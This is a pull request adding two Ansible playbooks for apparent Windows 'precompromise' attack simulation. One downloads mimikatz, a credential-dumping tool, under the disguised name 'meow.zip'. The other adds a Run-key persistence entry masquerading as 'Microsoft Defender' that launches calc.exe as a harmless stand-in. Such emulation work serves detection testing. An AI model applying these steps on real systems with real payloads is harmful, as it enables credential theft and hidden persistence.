### PR TITLE
add run keys and mimikatz scripts

### DIFF
--- a/scenarios/windows/precompromise/mimikatz.yml
+++ b/scenarios/windows/precompromise/mimikatz.yml
@@ -1,0 +1,9 @@
+---
+- name: "download mimikatz"
+  hosts: localhost
+  connection: local
+  tasks:
+    - name: "download mimikatz"
+      ansible.windows.win_get_url:
+        url: "https://codeload.github.com/gentilkiwi/mimikatz/zip/refs/tags/2.2.0-20210810-2"
+        path: "C:\\Users\\Carter Codell\\Downloads\\meow.zip"

--- a/scenarios/windows/precompromise/run-keys.yml
+++ b/scenarios/windows/precompromise/run-keys.yml
@@ -1,0 +1,11 @@
+---
+- name: "add an application to the Windows registry keys"
+  hosts: localhost
+  connection: local
+  tasks:
+    - name: "add the registry key"
+      ansible.windows.win_regedit:
+        path: "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
+        name: "Microsoft Defender"
+        type: "string"
+        data: "C:\\Windows\\System32\\calc.exe"


### PR DESCRIPTION
I wrote scripts for run keys and mimikatz. My Windows VM is as slow as a turtle and not registering key presses & mouse clicks so I can't actually test the scripts on a Windows environment. They are simple enough that they _should_ work. These are the steps I followed to try and get Ansible installed on my Windows VM: [https://opensource.com/article/19/2/ansible-windows-admin](https://opensource.com/article/19/2/ansible-windows-admin).

The above tutorial assumes the Windows machine uses AD and Kerberos to authenticate. We can change the authentication to be a basic username/password or to use certificates, more information at: [https://docs.ansible.com/ansible/latest/user_guide/windows_winrm.html](https://docs.ansible.com/ansible/latest/user_guide/windows_winrm.html).


A Windows VM can be installed at: [https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/](https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/).